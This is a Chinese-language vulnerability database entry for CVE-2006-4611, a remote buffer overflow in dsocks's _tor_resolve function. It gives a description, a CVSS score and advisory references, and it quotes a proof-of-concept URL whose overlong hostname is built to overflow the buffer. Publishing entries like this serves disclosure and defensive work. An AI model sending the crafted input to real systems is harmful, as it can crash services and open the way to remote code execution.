Dsocks 'dsocks.c' 缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110949 漏洞类型 缓冲区溢出
发布时间 2006-09-05 更新时间 2006-09-13
CVE编号 CVE-2006-4611 CNNVD-ID CNNVD-200609-086
漏洞平台 Multiple CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28491
https://cxsecurity.com/issue/WLB-2006090021
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-086
|漏洞详情
dsocks1.4之前版本的dsocks.c中_tor_resolve函数内的缓冲区溢出,远程攻击者可以通过可能与长节点名称有关的未明向量执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/19852/info

Dsocks is prone to a remote buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.

An attacker may exploit this vulnerability to execute arbitrary code in the context of the user running the application or to crash the application, resulting in denial-of-service conditions.

http://foo.123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234 56789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789 01234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234 5678901234567890123456789012345678901234567890.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAveryvery longname.com.invalid/
|参考资料

来源:MISC
链接:http://www.monkey.org/~dugsong/dsocks/
来源:XF
名称:dsocks-torresolve-bo(28762)
链接:http://xforce.iss.net/xforce/xfdb/28762
来源:BID
名称:19852
链接:http://www.securityfocus.com/bid/19852
来源:BUGTRAQ
名称:20060905Bufferoverflowvulnerabilityindsocks
链接:http://www.securityfocus.com/archive/1/archive/1/445200/100/0/threaded
来源:MILW0RM
名称:2303
链接:http://www.milw0rm.com/exploits/2303
来源:VUPEN
名称:ADV-2006-3526
链接:http://www.frsirt.com/english/advisories/2006/3526
来源:SECUNIA
名称:21771
链接:http://secunia.com/advisories/21771
来源:FULLDISC
名称:20060905Bufferoverflowvulnerabilityindsocks
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2006-September/049258.html
来源:SREASON
名称:1493
链接:http://securityreason.com/securityalert/1493
来源:MILW0RM
名称:2303
链接:http://milw0rm.com/exploits/2303